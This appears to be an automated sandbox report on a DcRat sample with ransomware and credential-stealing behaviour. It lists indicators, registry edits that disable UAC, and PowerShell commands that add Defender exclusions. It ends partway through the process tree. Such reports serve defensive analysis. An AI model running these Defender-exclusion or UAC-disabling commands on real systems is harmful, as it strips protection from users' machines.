Analysis
- max time kernel: 136s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 13-03-2023 09:29
Behavioral task: behavioral1
- Sample: ec50388a69792d133c1298e1dceb40a6.exe
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: ec50388a69792d133c1298e1dceb40a6.exe
- Resource: win10v2004-20230220-en
General
- Target: ec50388a69792d133c1298e1dceb40a6.exe
- Size: 2.3MB
- MD5: ec50388a69792d133c1298e1dceb40a6
- SHA1: 80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
- SHA256: bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
- SHA512: fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
- SSDEEP: 49152:PuxU6VfbIhv2/g8nn7HoqW2m86bzBvwv+P9gB8xy2LmQKV:Wi6VzIA/gg7IR8iVgB8xybQKV
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 24 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: schtasks.exe (24 instances)
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 220 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1752 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5032 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3240 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4116 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4084 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2748 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4672 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4892 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3888 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4612 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4760 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 540 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4224 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1300 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2440 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4932 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4948 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5108 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4984 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1680 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1584 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2084 | 4996 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3696 | 4996 | schtasks.exe
-
UAC bypass
Processes: ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe, ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontdrvhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | fontdrvhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | fontdrvhost.exe
-
Processes:
resource | yara_rule
behavioral2/memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmp | dcrat
behavioral2/memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmp | dcrat
behavioral2/memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmp | dcrat
behavioral2/memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmp | dcrat
behavioral2/memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmp | dcrat
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ec50388a69792d133c1298e1dceb40a6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ec50388a69792d133c1298e1dceb40a6.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | fontdrvhost.exe
-
Downloads MZ/PE file
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: AppLaunch.exe
description | ioc | process
File opened for modification | C:\Users\Admin\Pictures\UnprotectStop.tiff | AppLaunch.exe
File renamed | C:\Users\Admin\Pictures\LockGrant.crw => C:\Users\Admin\Pictures\LockGrant.crw.alice | AppLaunch.exe
File opened for modification | C:\Users\Admin\Pictures\LockGrant.crw.alice | AppLaunch.exe
File renamed | C:\Users\Admin\Pictures\UnprotectStop.tiff => C:\Users\Admin\Pictures\UnprotectStop.tiff.alice | AppLaunch.exe
File opened for modification | C:\Users\Admin\Pictures\UnprotectStop.tiff.alice | AppLaunch.exe
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe, ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | fontdrvhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | fontdrvhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ec50388a69792d133c1298e1dceb40a6.exe
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: m.exe, ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | m.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation | fontdrvhost.exe
-
Executes dropped EXE 5 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe, m.exe, h.exe, mm.exe
pid | process
4452 | ec50388a69792d133c1298e1dceb40a6.exe
3116 | fontdrvhost.exe
1304 | m.exe
3932 | h.exe
5260 | mm.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
behavioral2/memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmp | themida
C:\Recovery\WindowsRE\backgroundTaskHost.exe | themida
C:\Recovery\WindowsRE\RCX9F97.tmp | themida
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe | themida
behavioral2/memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmp | themida
behavioral2/memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmp | themida
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe | themida
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe | themida
behavioral2/memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmp | themida
behavioral2/memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmp | themida
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks whether UAC is enabled
Processes: ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe, ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | fontdrvhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontdrvhost.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ec50388a69792d133c1298e1dceb40a6.exe
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: AppLaunch.exe
description | ioc | process
File opened (read-only) | \??\W:, \??\U:, \??\O:, \??\G:, \??\Z:, \??\Q:, \??\L:, \??\V:, \??\A:, \??\Y:, \??\I:, \??\H:, \??\J:, \??\K:, \??\B:, \??\N:, \??\T:, \??\M:, \??\R:, \??\P:, \??\S:, \??\F:, \??\X:, \??\E: (one IoC per drive letter, 24 in total) | AppLaunch.exe
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
53 | ipinfo.io
54 | ipinfo.io
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe
pid | process
1636 | ec50388a69792d133c1298e1dceb40a6.exe
4452 | ec50388a69792d133c1298e1dceb40a6.exe
3116 | fontdrvhost.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes: h.exe, m.exe
description | pid | process | target process
PID 3932 set thread context of 4056 | 3932 | h.exe | AppLaunch.exe
PID 1304 set thread context of 3752 | 1304 | m.exe | vbc.exe
-
Drops file in Program Files directory 12 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
File opened for modification | C:\Program Files\Windows Security\RCXD3A2.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files\Windows Security\RCXD3F2.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Internet Explorer\images\RCXDBE6.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe | ec50388a69792d133c1298e1dceb40a6.exe
File created | C:\Program Files (x86)\Windows Defender\fr-FR\5b884080fd4f94 | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files\Windows Security\System.exe | ec50388a69792d133c1298e1dceb40a6.exe
File created | C:\Program Files (x86)\Internet Explorer\images\56085415360792 | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\RCXD15F.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File created | C:\Program Files\Windows Security\27d1bcfc3c54e0 | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Internet Explorer\images\wininit.exe | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\RCXD101.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Program Files (x86)\Internet Explorer\images\RCXDC06.tmp | ec50388a69792d133c1298e1dceb40a6.exe
-
Drops file in Windows directory 4 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
File opened for modification | C:\Windows\CbsTemp\dllhost.exe | ec50388a69792d133c1298e1dceb40a6.exe
File created | C:\Windows\CbsTemp\5940a34987c991 | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Windows\CbsTemp\RCXD888.tmp | ec50388a69792d133c1298e1dceb40a6.exe
File opened for modification | C:\Windows\CbsTemp\RCXD9B2.tmp | ec50388a69792d133c1298e1dceb40a6.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 25 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (25 instances)
pid | process
4224 | schtasks.exe
5108 | schtasks.exe
1584 | schtasks.exe
4040 | schtasks.exe
3240 | schtasks.exe
4672 | schtasks.exe
4892 | schtasks.exe
4760 | schtasks.exe
1300 | schtasks.exe
2440 | schtasks.exe
4932 | schtasks.exe
4948 | schtasks.exe
4984 | schtasks.exe
1680 | schtasks.exe
2748 | schtasks.exe
4612 | schtasks.exe
540 | schtasks.exe
4116 | schtasks.exe
4084 | schtasks.exe
3888 | schtasks.exe
2084 | schtasks.exe
3696 | schtasks.exe
220 | schtasks.exe
1752 | schtasks.exe
5032 | schtasks.exe
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe, vssadmin.exe
pid | process
5348 | vssadmin.exe
5800 | vssadmin.exe
-
Modifies registry class 2 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | ec50388a69792d133c1298e1dceb40a6.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | ec50388a69792d133c1298e1dceb40a6.exe
-
Suspicious behavior: EnumeratesProcesses 60 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, powershell.exe (x4), ec50388a69792d133c1298e1dceb40a6.exe, powershell.exe (x5), fontdrvhost.exe, powershell.exe, AppLaunch.exe, powershell.exe, m.exe
pid | process (consecutive identical rows collapsed with a count)
1636 | ec50388a69792d133c1298e1dceb40a6.exe (x3)
2380 | powershell.exe
3104 | powershell.exe
1912 | powershell.exe
692 | powershell.exe
3104 | powershell.exe
692 | powershell.exe
1912 | powershell.exe
2380 | powershell.exe
4452 | ec50388a69792d133c1298e1dceb40a6.exe (x3)
4080 | powershell.exe (x2)
3336 | powershell.exe (x2)
2180 | powershell.exe (x2)
4256 | powershell.exe (x2)
4868 | powershell.exe (x2)
3336 | powershell.exe
4080 | powershell.exe
2180 | powershell.exe
3116 | fontdrvhost.exe (x2)
4256 | powershell.exe
4868 | powershell.exe
3116 | fontdrvhost.exe (x19)
4684 | powershell.exe (x3)
4056 | AppLaunch.exe (x2)
5380 | powershell.exe (x3)
1304 | m.exe (x2)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: fontdrvhost.exe
pid | process
3116 | fontdrvhost.exe
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, powershell.exe (x4), ec50388a69792d133c1298e1dceb40a6.exe, powershell.exe (x5), fontdrvhost.exe, vssvc.exe, m.exe, powershell.exe, vssvc.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 1636 | ec50388a69792d133c1298e1dceb40a6.exe
Token: SeDebugPrivilege | 692 | powershell.exe
Token: SeDebugPrivilege | 2380 | powershell.exe
Token: SeDebugPrivilege | 1912 | powershell.exe
Token: SeDebugPrivilege | 3104 | powershell.exe
Token: SeDebugPrivilege | 4452 | ec50388a69792d133c1298e1dceb40a6.exe
Token: SeDebugPrivilege | 4080 | powershell.exe
Token: SeDebugPrivilege | 3336 | powershell.exe
Token: SeDebugPrivilege | 2180 | powershell.exe
Token: SeDebugPrivilege | 4256 | powershell.exe
Token: SeDebugPrivilege | 4868 | powershell.exe
Token: SeDebugPrivilege | 3116 | fontdrvhost.exe
Token: SeBackupPrivilege | 4632 | vssvc.exe
Token: SeRestorePrivilege | 4632 | vssvc.exe
Token: SeAuditPrivilege | 4632 | vssvc.exe
Token: SeDebugPrivilege | 1304 | m.exe
Token: SeDebugPrivilege | 4684 | powershell.exe
Token: SeBackupPrivilege | 5508 | vssvc.exe
Token: SeRestorePrivilege | 5508 | vssvc.exe
Token: SeAuditPrivilege | 5508 | vssvc.exe
Token: SeDebugPrivilege | 5380 | powershell.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: fontdrvhost.exe
pid | process
3116 | fontdrvhost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe, m.exe, h.exe, AppLaunch.exe, mm.exe, cmd.exe, cmd.exe
description | pid | process | target process (consecutive identical rows collapsed with a count)
PID 1636 wrote to memory of 692 | 1636 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 1636 wrote to memory of 2380 | 1636 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 1636 wrote to memory of 1912 | 1636 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 1636 wrote to memory of 3104 | 1636 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 1636 wrote to memory of 4452 | 1636 | ec50388a69792d133c1298e1dceb40a6.exe | ec50388a69792d133c1298e1dceb40a6.exe (x3)
PID 4452 wrote to memory of 4256 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 4956 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 3336 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 2180 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 4080 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 4868 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | powershell.exe (x3)
PID 4452 wrote to memory of 3116 | 4452 | ec50388a69792d133c1298e1dceb40a6.exe | fontdrvhost.exe (x3)
PID 3116 wrote to memory of 1304 | 3116 | fontdrvhost.exe | m.exe (x2)
PID 1304 wrote to memory of 4684 | 1304 | m.exe | powershell.exe (x2)
PID 3116 wrote to memory of 3932 | 3116 | fontdrvhost.exe | h.exe (x3)
PID 3932 wrote to memory of 4056 | 3932 | h.exe | AppLaunch.exe (x5)
PID 4056 wrote to memory of 4956 | 4056 | AppLaunch.exe | cmd.exe (x2)
PID 3116 wrote to memory of 5260 | 3116 | fontdrvhost.exe | mm.exe (x2)
PID 5260 wrote to memory of 5380 | 5260 | mm.exe | powershell.exe (x2)
PID 4056 wrote to memory of 5740 | 4056 | AppLaunch.exe | cmd.exe (x2)
PID 5740 wrote to memory of 5800 | 5740 | cmd.exe | vssadmin.exe (x2)
PID 1304 wrote to memory of 6136 | 1304 | m.exe | cmd.exe (x2)
PID 6136 wrote to memory of 4040 | 6136 | cmd.exe | schtasks.exe (x2)
PID 1304 wrote to memory of 3752 | 1304 | m.exe | vbc.exe (x2)
-
System policy modification 1 TTPs 9 IoCs
Processes: ec50388a69792d133c1298e1dceb40a6.exe, ec50388a69792d133c1298e1dceb40a6.exe, fontdrvhost.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | fontdrvhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | ec50388a69792d133c1298e1dceb40a6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | fontdrvhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | fontdrvhost.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"1⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\backgroundTaskHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"2⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'3⤵PID:4956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\System.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\winlogon.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\dllhost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe"C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe"3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3116 -
Depth 4: C:\Users\Admin\AppData\Local\Temp\m.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\m.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1304

Depth 5: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4684

Depth 5: C:\Windows\System32\cmd.exe
